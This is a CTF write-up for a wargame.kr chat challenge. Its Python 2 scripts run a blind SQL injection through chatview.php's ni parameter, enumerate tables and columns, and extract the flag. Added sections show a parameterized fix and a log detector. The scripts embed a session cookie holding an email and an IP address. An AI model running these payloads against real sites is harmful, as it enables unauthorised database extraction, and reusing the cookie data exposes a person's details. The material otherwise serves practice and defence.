This is the challenge screen.
It is a SQL injection challenge. The hint is to think from the developer's point of view.
A prompt asking for an ID appears. I'll type in anything.
A simple chat screen comes up. After typing a message there is a short delay, and then the chat is shown in real time.
Following the source code, requesting chatlog.php?t=1 returns a number. After sending another chat message and checking again, the number has gone up, so it is probably related to the total number of chat messages so far.
Also as in the source code, entering 20808 at chatview.php?t=1&ni= shows nothing, but entering 20807 shows the message I just sent.
And entering 20806 shows two messages, the previous one included.
So it appears that ni is treated as the starting number and the chat rows from there up to the most recently sent message, that is (number of the last chat message - entered value) rows, are displayed.
I also tried an injection on ni and it went through, so this looks like the part the challenge is meant to be solved with.
I'll pull data out with a union select.
For a union select the number of selected columns has to match the original query's, so after guessing at the count, selecting five columns works.
chat_log_secret, at the very bottom, is the most suspicious table. For practice I'll use Python to get the number of tables, then the table names, and from there the columns.
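The behaviour inferred above (ni as the starting message number, and a non-numeric ni still reaching the database) can be reproduced offline. The following is an added example, not code from the writeup or from wargame.kr: it rebuilds the chatview.php query on SQLite with the string-concatenated form beside a parameterized form, and renders the conditional payload shape used in the scripts below with a SQLite CASE expression in place of MySQL's if(). The table layout, the column names and the exact WHERE clause are assumptions chosen so that the observations on the page (20808 shows nothing, 20807 one row, 20806 two rows) come out the same.

```python
# Added example (not from the writeup): the chatview.php behaviour inferred above,
# rebuilt offline on SQLite. Table layout, column names and the WHERE clause are
# assumptions chosen to reproduce the observations on the page.
import re
import sqlite3

LAST_CHAT_NO = 20807  # constructed: number of the most recent message


def make_db():
    """In-memory chat_log with five columns and eight constructed messages."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE chat_log (no INTEGER, chat_id TEXT, msg TEXT, ts INTEGER, room INTEGER)"
    )
    rows = [(LAST_CHAT_NO - 7 + k, "abc", "message %d" % k, 1475422000 + k, 1)
            for k in range(8)]
    con.executemany("INSERT INTO chat_log VALUES (?, ?, ?, ?, ?)", rows)
    return con


def chatview_vulnerable(con, ni):
    """The pattern the writeup exploits: ni is pasted straight into the SQL text."""
    sql = "SELECT no, chat_id, msg, ts, room FROM chat_log WHERE " + ni + " <= no"
    return con.execute(sql).fetchall()


def chatview_fixed(con, ni):
    """Hardened form: ni must be a decimal number and is bound as a parameter.
    A real handler would answer HTTP 400 instead of silently returning no rows."""
    if not re.fullmatch(r"[0-9]{1,10}", ni):
        return []
    sql = "SELECT no, chat_id, msg, ts, room FROM chat_log WHERE ? <= no"
    return con.execute(sql, (int(ni),)).fetchall()


def blind_probe(con, condition_sql):
    """Shape of the boolean oracle used by the scripts in the writeup
    (MySQL if() rendered as SQLite CASE): rows come back only when
    condition_sql is true, because the false branch yields an impossible
    starting number."""
    payload = "20800 and (case when (%s) then 20800 else 5555555 end)" % condition_sql
    return len(chatview_vulnerable(con, payload)) > 0


if __name__ == "__main__":
    con = make_db()
    print(len(chatview_vulnerable(con, "20806")))  # 2, as observed in the writeup
    print(blind_probe(con, "(select count(*) from sqlite_master) = 1"))  # True
    print(blind_probe(con, "(select count(*) from sqlite_master) = 2"))  # False
    print(chatview_fixed(con, "20800 and 1=1"))  # [] : payload rejected
```

The parameterized handler removes the oracle entirely: whatever arrives in ni is either a number bound as a value or rejected before any SQL is built, so the response no longer depends on an attacker-chosen condition.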
# table count (Python 2: urllib2, print statement)
import urllib2, re, sys

print "[+] Start!"
for i in range(50):
    # boolean oracle: if the number of tables equals i, ni becomes 20798 and rows are shown;
    # otherwise ni becomes 5555555 and nothing comes back
    dat = "t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)="+str(i)+",20798,5555555)"
    url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat
    req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
    res = urllib2.urlopen(req).read()
    # chat rows carry this style attribute, so its presence means the condition held
    if "font-size:12px;" in res:
        print "[+] SUCCESS!"
        print "[*] counting : " + str(i)
        break
sys.exit(1)
There are 42 tables, indices 0 through 41.
# table name extraction (Python 2)
import urllib2, re

n = 0
print "[+] Start!"
while(n<42):
    table = ""
    for i in range(40):          # at most 40 characters per table name
        for j in range(48,97):   # '0'..'`': digits, some punctuation and A-Z
            # is the (i+1)-th character of the n-th table name equal to chr(j)?
            dat = "t=1&ni=20798%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
            url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
            req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
            res = urllib2.urlopen(req).read()
            if "font-size:12px;" in res:
                table += chr(j)
                break
    print "find table : " + table
    n += 1
print "[+] Finish!"
The chat_log_secret table shows up at the very bottom.
Now I'll get the number of columns.
# column count (Python 2)
import urllib2, re, sys

print "[+] Start!"
for i in range(500):
    # same oracle as for the table count, now over information_schema.columns
    dat = "t=1&ni=20798%20and%20if((select%20count(column_name)%20from%20information_schema.columns)="+str(i)+",20798,5555555)"
    url = "http://wargame.kr:8080/web_chatting/chatview.php?" + dat
    req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
    res = urllib2.urlopen(req).read()
    if "font-size:12px;" in res:
        print "[+] SUCCESS!"
        print "[*] counting : " + str(i)
        break
sys.exit(1)
There are 486 columns. Now I'll find the column names.
# column names (Python 2)
import urllib, urllib2, re, sys, time, os

n = 0
print "[+] Start!"
while(n<486):   # 486 columns were counted above (indices 0 to 485)
    column = ""
    for i in range(40):          # at most 40 characters per column name
        for j in range(48,97):   # '0'..'`': digits, some punctuation and A-Z
            # is the (i+1)-th character of the n-th column name equal to chr(j)?
            dat = "t=1&ni=20798%20and%20if(substring((select%20column_name%20from%20information_schema.columns%20limit%20+"+str(n)+",1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,5555555)"
            url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
            req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
            res = urllib2.urlopen(req).read()
            if "font-size:12px;" in res:
                column += chr(j)
                break
    print "find column : " + column   # the original printed an undefined name (key) here
    n += 1
print "[+] Finish!"
The suspicious column is readme.
With the table and column known, I'll get the flag.
# flag extraction (Python 2)
import urllib2, re

print "[+] Start!"
flag = ""
for i in range(40):          # at most 40 characters
    for j in range(48,97):   # '0'..'`': digits, some punctuation and A-Z
        # is the (i+1)-th character of chat_log_secret.readme equal to chr(j)?
        dat = "t=1&ni=20798%20and%20if(substring((select%20readme%20from%20chat_log_secret%20limit%200,1),"+str(i+1)+",1)=0x"+hex(j)[2:]+",20798,55555)"
        url = "http://wargame.kr:8080/web_chatting/chatview.php?"+dat
        req = urllib2.Request(url, headers={'Cookie': "chat_id=abc; ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2249534295bb79f7e2f039f2fb82eac59d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%221.239.164.68%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.116+Safari%2F537.3%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1475422473%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A3%3A%22sso%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22cys7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22over+20%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%229750%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1475414381%3B%7D0210942423309839f7ff2cee2270cedf37687cda",})
        res = urllib2.urlopen(req).read()
        if "font-size:12px;" in res:
            flag += chr(j)
            break
print "[*] FLAG : " + flag
print "[+] Finish!"
Got the flag.
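From the defender's side, the extraction above leaves a distinctive trace: one chatview.php request per candidate character, all from one client, each with an ni that is anything but a plain number. The following is an added example, not part of the writeup: a small scanner that reads access-log lines, flags chatview.php requests whose ni parameter is not purely decimal, and counts chatview.php hits per client as a crude automation indicator. The log lines are constructed samples in the common log format; the path and the t and ni parameters come from the page, while the client addresses, timestamps and sizes are made up.

```python
# Added example (not part of the writeup): detector for the access-log footprint
# of the blind extraction above. SAMPLE_LOG is constructed; only the path and
# parameter names come from the page.
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
192.0.2.10 - - [02/Oct/2016:15:34:33 +0900] "GET /web_chatting/chatview.php?t=1&ni=20806 HTTP/1.1" 200 512
192.0.2.10 - - [02/Oct/2016:15:34:35 +0900] "GET /web_chatting/chatview.php?t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)=0,20798,5555555) HTTP/1.1" 200 210
192.0.2.10 - - [02/Oct/2016:15:34:35 +0900] "GET /web_chatting/chatview.php?t=1&ni=20798%20and%20if((select%20count(table_name)%20from%20information_schema.tables)=1,20798,5555555) HTTP/1.1" 200 210
192.0.2.20 - - [02/Oct/2016:15:34:36 +0900] "GET /web_chatting/chatlog.php?t=1 HTTP/1.1" 200 5
192.0.2.20 - - [02/Oct/2016:15:34:37 +0900] "GET /web_chatting/chatview.php?t=1&ni=20807 HTTP/1.1" 200 300
"""


def scan(log_text):
    """Walk the log and return (alerts, hits).

    alerts: (client ip, timestamp, decoded ni) for every chatview.php request
            whose ni is not a plain decimal number, i.e. the parameter carried
            something other than a message number
    hits:   chatview.php requests per client; the scripts above need one
            request per candidate character, so the count climbs quickly
    """
    alerts = []
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/chatview.php"):
            continue
        hits[m.group("ip")] += 1
        # parse_qs percent-decodes the value, so "%20and%20if(" becomes " and if("
        for ni in parse_qs(parts.query).get("ni", []):
            if not re.fullmatch(r"[0-9]+", ni):
                alerts.append((m.group("ip"), m.group("ts"), ni))
    return alerts, hits


if __name__ == "__main__":
    alerts, hits = scan(SAMPLE_LOG)
    for ip, ts, ni in alerts:
        print("ALERT %s %s ni=%r" % (ip, ts, ni))
    print(dict(hits))
```

The check is deliberately an allow-list (ni must be decimal) rather than a search for keywords such as select or if, so it also catches payloads that avoid the obvious words; the per-client counter is what separates a single odd request from a character-by-character extraction run.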